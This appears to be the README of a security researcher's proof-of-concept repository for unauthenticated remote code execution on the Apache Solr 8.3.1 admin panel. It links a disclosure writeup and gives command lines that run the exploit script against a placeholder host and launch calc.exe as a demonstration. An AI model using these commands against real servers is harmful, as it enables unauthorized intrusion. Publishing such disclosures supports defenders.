/Apache-Solr-8.3.1-RCE

RCE on Apache Solr 8.3.1

Primary LanguagePython

Apache Solr 8.3.1 admin panel RCE (Windows)

Description:

This exploit allows code execution without any prior authentication on a default Solr admin panel.

Authors:

  • Nicolas Brunner - SCRT

Writeup

https://blog.scrt.ch/2023/05/01/solr-rce-from-exposed-administration-interface/

PoC:

Examples:

If no core exists, create the core from the default folder:
./exploit.py -u http://example.com/solr --default-core -c core_123
Using the existing core named core_123, create a new vulnerable core and execute calc.exe:
./exploit.py -u http://example.com/solr -f calc.xml -c core_123

Installation:

Installation of the required python libraries
pip3 install -r requirements.txt